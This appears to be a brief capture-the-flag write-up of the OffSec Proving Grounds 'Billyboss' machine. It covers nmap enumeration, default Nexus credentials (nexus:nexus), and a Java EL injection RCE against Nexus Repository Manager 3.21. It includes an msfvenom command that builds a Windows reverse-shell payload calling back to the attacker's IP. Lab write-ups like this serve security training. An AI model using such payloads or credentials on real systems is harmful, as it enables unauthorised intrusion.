Billyboss
Writeup for Billyboss from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.170.61 all
Service Enumeration
HTTP (port 8081)
We see that this is running Sonatype Nexus Repository Manager 3.21.0.5
.
We can try various different default credentials and find that only nexus:nexus
works.
Exploit
There is an exploit for Nexus Repository Manager 3 versions 3.21.1 and below which is vulnerable to Java EL injection which allows a low privilege user to gain RCE on the target.
First, we generate our payload using MSF venom.
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081
We then modify the script to download our payload and execute it.
Next, we execute the script and verify that the payload has been downloaded to our target machine.
Next, we change the CMD command to 'cmd.exe /c shell.exe'
and we run the script again.
Last updated